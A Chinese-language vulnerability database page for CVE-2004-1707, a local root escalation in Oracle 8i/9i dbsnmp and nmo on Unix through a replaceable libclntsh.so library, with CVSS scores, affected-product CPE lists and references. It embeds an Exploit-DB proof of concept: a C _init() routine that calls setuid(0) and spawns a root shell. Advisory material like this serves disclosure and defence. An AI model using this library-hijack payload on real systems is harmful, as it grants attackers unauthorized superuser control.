CVE-2004-1707
CVSS7.2
发布时间 :2004-07-30 00:00:00
修订时间 :2016-10-17 22:59:32
NMCOE    

[原文]The (1) dbsnmp and (2) nmo programs in Oracle 8i, Oracle 9i, and Oracle IAS 9.0.2.0.1, on Unix systems, use a default path to find and execute library files while operating at raised privileges, which allows certain Oracle user accounts to gain root privileges via a modified libclntsh.so.9.0.


[CNNVD]Oracle数据库默认库目录权限提升漏洞(CNNVD-200407-099)

        在Unix系统平台上的Oracle 8i, Oracle 9i,和Oracle IAS 9.0.2.0.1版本的(1) dbsnmp和(2) nmo程序存在漏洞。该漏洞在提高权限操作时使用默认的路径找到并执行库文件,并允许某些Oracle用户帐户借助修改libclntsh.so.9.0版本提升根特权。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:oracle:database_server_lite:5.0.2Oracle Oracle9i Lite 5.0.2
cpe:/a:oracle:database_server_lite:5.0.1Oracle Oracle9i Lite 5.0.1
cpe:/a:oracle:database_server_lite:5.0Oracle Oracle9i Lite 5.0
cpe:/a:oracle:oracle9i:client_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0
cpe:/a:oracle:oracle9i:client_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2
cpe:/a:oracle:application_server_portal:3.0.9.8.5Oracle Oracle9i Application Server Portal 3.0.9.8.5
cpe:/a:oracle:oracle9i:standard_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.2.0.4
cpe:/a:oracle:oracle9i:standard_9.2.0.3
cpe:/a:oracle:application_server:1.0.2.2.2Oracle Oracle9i Application Server 1.0.2.2.2
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.0.0
cpe:/a:oracle:oracle8i:standard_8.0.6_.3
cpe:/a:oracle:application_serverOracle Application Server
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.1
cpe:/a:oracle:oracle9i:enterprise_9.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0
cpe:/a:oracle:application_server:9.0.3Oracle Oracle9i Application Server 9.0.3
cpe:/a:oracle:application_server:9.0.3.1Oracle Application Server 10g 9.0.3.1
cpe:/a:oracle:application_server_portal:9.0.2.3bOracle Oracle9i Application Server Portal 9.0.2.3B
cpe:/a:oracle:application_server_portal:9.0.2.3Oracle Oracle9i Application Server Portal 9.0.2.3
cpe:/a:oracle:oracle8i:standard_8.0.6
cpe:/a:oracle:oracle8i:enterprise_8.0.5_.0.0
cpe:/a:oracle:application_server:9.0.2.0.1Oracle Oracle9i Application Server 9.0.2.0.1
cpe:/a:oracle:application_server:9.0.2.0.0Oracle Oracle9i Application Server 9.0.2.0.0
cpe:/a:oracle:application_server_portal:9.0.2.3aOracle Oracle9i Application Server Portal 9.0.2.3A
cpe:/a:oracle:oracle9i:standard_9.0.1.3
cpe:/a:oracle:oracle9i:standard_9.0.1.2
cpe:/a:oracle:oracle9i:standard_9.0.1.5
cpe:/a:oracle:oracle9i:standard_9.0.1.4
cpe:/a:oracle:oracle9i:personal_9.0.1
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7_.0.0
cpe:/a:oracle:oracle9i:personal_8.1.7
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.1.0
cpe:/a:oracle:oracle9i:personal_9.2.0.4
cpe:/a:oracle:application_server:1.0.2Oracle Application Server 9i 1.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.2
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.0
cpe:/a:oracle:oracle9i:personal_9.2.0.3
cpe:/a:oracle:application_server:1.0.2.1sOracle Application Server 9i 1.0.2.1s
cpe:/a:oracle:oracle9i:enterprise_9.0.1.4
cpe:/a:oracle:oracle9i:enterprise_9.0.1.5
cpe:/a:oracle:application_server:1.0.2.2Oracle Application Server 9i 1.0.2.2
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.7_.1
cpe:/a:oracle:oracle8i:standard_8.1.7_.4
cpe:/a:oracle:oracle9i:standard_9.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0.1
cpe:/a:oracle:application_server:9.0.2.1Oracle Oracle10g Application Server 9.0.2.1
cpe:/a:oracle:application_server:9.0.2.2Oracle Oracle9i Application Server 9.0.2.2
cpe:/a:oracle:oracle8i:standard_8.1.7
cpe:/a:oracle:application_server:9.0.2.3Oracle Application Server 10g 9.0.2.3
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0.2
cpe:/a:oracle:oracle9i:enterprise_9.2.0.3
cpe:/a:oracle:oracle9i:enterprise_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2
cpe:/a:oracle:oracle8i:standard_8.1.6
cpe:/a:oracle:oracle9i:standard_9.2.3
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.0
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.0.0
cpe:/a:oracle:oracle9i:personal_9.0.1.5
cpe:/a:oracle:application_server:9.0.2Oracle Application Server 9i 9.0.2
cpe:/a:oracle:oracle9i:personal_9.0.1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1707
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1707
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-099
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109147677214087&w=2
(UNKNOWN)  BUGTRAQ  20040802 OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)
http://www.securityfocus.com/bid/10829
(VENDOR_ADVISORY)  BID  10829
http://xforce.iss.net/xforce/xfdb/16839
(VENDOR_ADVISORY)  XF  oracle-libraries-gain-privileges(16839)

- 漏洞信息

Oracle数据库默认库目录权限提升漏洞
高危 配置错误
2004-07-30 00:00:00 2006-05-01 00:00:00
本地  
        在Unix系统平台上的Oracle 8i, Oracle 9i,和Oracle IAS 9.0.2.0.1版本的(1) dbsnmp和(2) nmo程序存在漏洞。该漏洞在提高权限操作时使用默认的路径找到并执行库文件,并允许某些Oracle用户帐户借助修改libclntsh.so.9.0版本提升根特权。
        

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24335)

Oracle9i Database Default Library Directory Privilege Escalation Vulnerability (EDBID:24335)
unix local
2004-07-30 Verified
0 Juan Manuel Pascual Escribá
N/A [点击下载]
source: http://www.securityfocus.com/bid/10829/info

Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.

This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.

It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.

#include
#include

_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}		

- 漏洞信息

8286
Oracle Application and Database Server Local Library Privilege Escalation
Local Access Required Misconfiguration
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Default implementations of Oracle and Oracle Application Server on Linux and Unix based system's contain a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue arises when installed Oracle libraries are owned by Oracle as is the case on default implementations. A malicious local user with an oracle software account could replace libraries used by setuid root applications with arbitrary code. This would result in the user being able to escalate their privileges or execute code as the superuser. This flaw may lead to a loss of system integrity.

- 时间线

2004-07-30 Unknow
2004-07-30 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站